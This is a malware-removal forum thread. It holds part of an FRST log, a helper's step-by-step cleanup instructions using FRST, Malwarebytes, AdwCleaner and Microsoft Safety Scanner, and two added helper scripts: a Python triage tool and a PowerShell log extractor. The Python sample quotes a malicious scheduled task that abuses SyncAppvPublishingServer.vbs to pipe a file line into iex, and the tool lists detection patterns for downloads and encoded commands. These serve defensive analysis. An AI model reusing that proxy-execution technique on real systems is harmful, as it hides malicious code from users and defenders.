2021-10-05 20:10 - 2018-07-15 16:26 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-05 15:42 - 2021-05-15 10:25 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-10-05 11:52 - 2021-06-28 06:44 - 000004170 _____ C:\WINDOWS\system32\Tasks\Opera scheduled assistant Autoupdate 1583006413
2021-10-05 08:22 - 2021-05-15 10:49 - 000003958 _____ C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1531693452
2021-10-05 08:22 - 2018-07-15 16:24 - 000001113 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2021-10-04 21:37 - 2020-01-19 19:48 - 000000000 ____D C:\Users\User\AppData\Local\Battle.net
2021-10-04 15:25 - 2020-01-19 19:52 - 000000000 ____D C:\ProgramData\Blizzard Entertainment
2021-10-04 15:03 - 2020-01-19 19:42 - 000000000 ____D C:\Program Files (x86)\Battle.net
2021-10-04 15:02 - 2020-01-19 19:48 - 000000000 ____D C:\Users\User\AppData\Roaming\Battle.net
2021-10-04 10:51 - 2021-05-15 10:31 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-10-04 10:51 - 2021-05-15 10:31 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-10-01 23:03 - 2021-06-14 15:36 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-10-01 23:03 - 2021-06-14 15:36 - 000003386 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d749a94146afaf
2021-10-01 17:34 - 2021-05-15 10:49 - 000003378 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1006842105-1920769258-2521470405-1001
2021-10-01 17:34 - 2021-05-15 10:05 - 000002380 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-10-01 12:11 - 2021-03-20 13:54 - 012566520 _____ C:\WINDOWS\system32\Drivers\FACEIT.sys
2021-10-01 12:03 - 2021-05-15 10:49 - 000003420 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-01 12:03 - 2021-05-15 10:49 - 000003296 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2021-09-30 21:16 - 2021-06-21 12:27 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2021-09-28 20:59 - 2018-12-29 17:18 - 000000000 ____D C:\Users\User\AppData\Roaming\.ACEStream
2021-09-22 20:47 - 2020-03-22 17:26 - 000002249 _____ C:\Users\User\Desktop\FACEIT.lnk
2021-09-20 21:29 - 2018-08-11 14:12 - 000000000 ____D C:\Users\User\AppData\Local\D3DSCache
2021-09-18 22:27 - 2018-07-28 15:02 - 000000000 ____D C:\Users\User\AppData\Roaming\discord
2021-09-18 21:36 - 2018-07-28 15:02 - 000000000 ____D C:\Users\User\AppData\Local\Discord
2021-09-15 08:17 - 2021-06-21 12:28 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task

==================== Files in the root of some directories ========

2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ () C:\Users\User\AppData\Local\D21F5E.tmp
2021-10-04 19:10 - 2021-10-04 19:10 - 000000000 _____ () C:\Users\User\AppData\Local\D243BC.tmp
2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ () C:\Users\User\AppData\Local\D2647.tmp
2021-10-05 11:58 - 2021-10-05 11:58 - 000000000 _____ () C:\Users\User\AppData\Local\D27C45.tmp
2021-10-05 21:00 - 2021-10-05 21:00 - 000000000 _____ () C:\Users\User\AppData\Local\D290DB.tmp
2021-10-04 16:29 - 2021-10-04 16:29 - 000000000 _____ () C:\Users\User\AppData\Local\D2EBB3.tmp

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

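The line that matters in the FRST log above is the NetServices scheduled task: it runs the Microsoft-signed SyncAppvPublishingServer.vbs with an argument that reads one line out of a file under AppData and hands it to iex, so the task itself looks like a built-in Windows entry while the actual code lives in a "log" file. As an added example that is not part of the original posts or of FRST itself, the Python below parses FRST "Task:" lines and flags that pattern (script host or proxy script plus injected arguments); the sample excerpt is constructed in the log's format, with the opaque trailing token of the injected command replaced by a placeholder.

```python
"""Triage FRST 'Task:' lines for scheduled tasks that feed injected commands
into a script host (added example for this thread; not FRST's own code)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One FRST task line looks like:
#   Task: {GUID} - System32\Tasks\<name> => <target> [<size> <date>] (<signer>) -> <arguments>
# Everything after the target is optional; the pattern is derived from the log above.
TASK_RE = re.compile(
    r"^Task:\s*\{(?P<guid>[0-9A-Fa-f-]+)\}\s*-\s*(?P<name>.+?)\s*=>\s*(?P<target>.+?)"
    r"(?:\s*\[(?P<size>\d+)\s+(?P<date>\d{4}-\d{2}-\d{2})\])?"
    r"(?:\s*\((?P<signer>[^)]*)\))?"
    r"(?:\s*->\s*(?P<args>.*))?$"
)

# Binaries and file types whose command line is effectively code.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")
SCRIPT_EXTS = (".vbs", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd", ".hta")
# Microsoft-signed scripts documented (LOLBAS) as passing their arguments into
# PowerShell, which is exactly what the NetServices task in the log relies on.
PROXY_SCRIPTS = ("syncappvpublishingserver.vbs",)
# Argument fragments that, on a script host, point to staged or fileless execution.
ARG_INDICATORS = {
    "in-memory execution (iex / Invoke-Expression)": r"\biex\b|invoke-expression",
    "reads a local file (Get-Content)": r"get-content",
    "network download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "encoded command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
    "base64 decode": r"frombase64string",
    "payload under a user-writable path": r"\\(?:users|programdata|temp)\\",
}


@dataclass
class Task:
    guid: str
    name: str
    target: str
    signer: Optional[str]
    args: Optional[str]


def parse_task_line(line: str) -> Optional[Task]:
    """Parse one 'Task:' line; return None for any other line of the log."""
    m = TASK_RE.match(line.strip())
    if m is None:
        return None
    return Task(m["guid"], m["name"], m["target"].strip(), m["signer"], m["args"])


def assess(task: Task) -> list[str]:
    """Reasons this task deserves a closer look; an empty list means nothing odd was seen."""
    reasons: list[str] = []
    base = task.target.rsplit("\\", 1)[-1].lower()
    runs_script = base in SCRIPT_HOSTS or base.endswith(SCRIPT_EXTS)
    if base in PROXY_SCRIPTS and task.args:
        reasons.append(f"{base} hands its arguments to PowerShell (known proxy-execution script)")
    if runs_script and task.args:
        for label, pattern in ARG_INDICATORS.items():
            if re.search(pattern, task.args, re.IGNORECASE):
                reasons.append(label)
    # A name under Microsoft\Windows\ is only reassuring if the task behaves like a built-in one.
    if reasons and task.name.lower().startswith("system32\\tasks\\microsoft\\windows\\"):
        reasons.append("task name imitates the Microsoft\\Windows namespace")
    return reasons


def triage_frst(text: str) -> dict[str, list[str]]:
    """Map task name -> reasons for every suspicious task line in an FRST log."""
    flagged: dict[str, list[str]] = {}
    for line in text.splitlines():
        task = parse_task_line(line)
        if task is not None:
            reasons = assess(task)
            if reasons:
                flagged[task.name] = reasons
    return flagged


# Constructed excerpt in the FRST format of the log above; the opaque trailing token
# of the injected command is replaced with a placeholder.
SAMPLE_FRST = r"""
==================== Scheduled Tasks (Whitelisted) ============
Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;<TRAILING-TOKEN-OMITTED>
Task: {443739FD-902C-4413-92E2-A2B9D521B3F8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {DA484D77-30F9-4609-977D-6D03BBF981E6} - System32\Tasks\Opera scheduled assistant Autoupdate 1583006413 => C:\Program Files\Opera\launcher.exe [42731728 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Program Files\Opera\assistant" $(Arg0)
Task: {C963BF0C-DAAA-4772-BB45-1E812E079F22} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXvGPUDisableTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe
"""

if __name__ == "__main__":
    for name, reasons in triage_frst(SAMPLE_FRST).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Only the NetServices task is reported; the Defender, Opera and RemoteFX entries parse cleanly but produce no reasons, which is the behaviour you want from a first-pass filter over a long log.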

Hello colbski,

Thanks for the update, continue:

Please download the attached fixlist.txt file and save it to the Desktop or location where you ran FRST from.

NOTE. It's important that both files, FRST or FRSTEnglish, and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system that cannot be undone.

Run FRST or FRST64 and press the Fix button just once and wait.
If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart.
The tool will make a log on the Desktop (Fixlog.txt) or wherever you ran FRST from. Please attach or post it to your next reply.

Note: If the tool warned you about an outdated version please download and run the updated version.

NOTE-1: This fix will run a scan to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files.

NOTE-2: As part of this fix all temporary files will be removed. If you have any open web pages that have not been bookmarked please make sure you bookmark them now as all open applications will be automatically closed. Also, make sure you know the passwords for all websites as cookies will also be removed.

The following directories are emptied:
 
  • Windows Temp
  • Users Temp folders
  • Edge, IE, FF, Chrome and Opera caches, HTML5 storages, Cookies and History
  • Recently opened files cache
  • Flash Player cache
  • Java cache
  • Steam HTML cache
  • Explorer thumbnail and icon cache
  • BITS transfer queue (qmgr*.dat files)
  • Recycle Bin


Important: items are permanently deleted. They are not moved to quarantine. If you have any questions or concerns please ask before running this fix.


The system will be rebooted after the fix has run.

Next,

Download Malwarebytes version 4 from the following link:

https://www.malwarebytes.com/mwb-download/thankyou/

Double click on the installer and follow the prompts.

When the install completes or Malwarebytes is already installed do the following:

Open Malwarebytes and select the small cog wheel in the top right-hand corner; that will open "Settings". From there select the "Security" tab.

Scroll down to "Scan Options" and ensure Scan for Rootkits and Scan within Archives are both on....

Close the settings window; this will take you back to the "Dashboard". Select the blue "Scan Now" tab......

When the scan completes, quarantine any found entries...

To get the log from Malwarebytes do the following:
 
  • Open Malwarebytes
  • Click on the Detection History tab from the main interface.
  • Then click on "History"; that will open a historical list.
  • Double click on the Scan log which shows the date and time of the scan just performed.
  • Click Export. From Export you have two options:
    Copy to Clipboard - if selected, right click in your reply and select "Paste"; the log will be pasted into your reply
    Text file (*.txt) - if selected, you will have to name the file and save it to a place of choice, recommend "Desktop", then attach to reply
  • Please use "Text file (*.txt)", then name the file and save it to a place of choice, recommend "Desktop", then attach to reply


Next,

Download AdwCleaner by Malwarebytes onto your Desktop.

Or from this Mirror
 
  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the EULA (I accept), then click on Scan
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Quarantine button. This will kill all the active processes
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply


Next,

Download "Microsoft's Safety Scanner" and save direct to the desktop

Ensure to get the correct version for your system....

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download


Right-click on the tool and select Run as Administrator; the tool will expand to the options window.
In the "Scan Type" window, select Quick Scan.
Perform a scan and click Finish when the scan is done.


Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function
2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\msert.log

The log will include log details for each time MSRT has run; we only need the most recent log by date and time....

Let me see those logs in your reply...

Thank you,

Kevin.

fixlist.txt

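As an added example (not part of Kevin's post or the original thread), a PowerShell function that pulls only the most recent run out of msert.log, so the poster does not have to paste every earlier scan. The run markers it keys on ("Microsoft Safety Scanner v" header, "Started On" stamp) are assumptions about the log layout, and the sample log is constructed for this example.

```powershell
# Added example (not from the thread): keep only the most recent Microsoft Safety
# Scanner run recorded in msert.log, which is all the helper asked for.
# ASSUMPTION: each run starts with a line beginning "Microsoft Safety Scanner v" and
# contains a "Started On <date>" line; check these markers against your own msert.log.
function Get-LatestMsertRun {
    param([string]$Path = 'C:\Windows\debug\msert.log')   # path given in the thread
    $runs    = New-Object 'System.Collections.Generic.List[object]'
    $current = $null
    foreach ($line in (Get-Content -Path $Path)) {
        if ($line -like 'Microsoft Safety Scanner v*') {
            if ($current) { $runs.Add($current) }          # close the previous run
            $current = [pscustomobject]@{
                Started = $null
                Text    = New-Object 'System.Collections.Generic.List[string]'
            }
        }
        if (-not $current) { continue }                    # text before the first header
        $current.Text.Add($line)
        if ($line -match '^Started On (.+)$') {
            # asctime-style stamp, e.g. "Wed Oct  6 20:38:19 2021"; collapse double spaces
            $stamp = ($Matches[1] -replace '\s+', ' ').Trim()
            $current.Started = [datetime]::ParseExact($stamp, 'ddd MMM d HH:mm:ss yyyy',
                                                      [cultureinfo]::InvariantCulture)
        }
    }
    if ($current) { $runs.Add($current) }

    # Newest run by start time; runs with no parsable date are skipped
    $latest = $runs | Where-Object { $_.Started } | Sort-Object Started | Select-Object -Last 1
    if ($latest) { return ($latest.Text -join [Environment]::NewLine) }
}

# Constructed two-run sample (the newer run is listed first to show sorting is by date)
$sample = @"
Microsoft Safety Scanner v1.0, (build 1.0.0.0)
Started On Wed Oct  6 20:38:19 2021
No infection found.
Microsoft Safety Scanner Finished On Wed Oct  6 20:40:11 2021
Return code: 0 (0x0)

Microsoft Safety Scanner v1.0, (build 1.0.0.0)
Started On Mon Oct  4 09:12:00 2021
No infection found.
Microsoft Safety Scanner Finished On Mon Oct  4 09:15:42 2021
Return code: 0 (0x0)
"@
$tmp = Join-Path $env:TEMP 'msert-sample.log'; Set-Content -Path $tmp -Value $sample
Get-LatestMsertRun -Path $tmp
```

Running it against the real file (the default path) returns just the latest block, which is the part to paste into the reply.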

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks

 
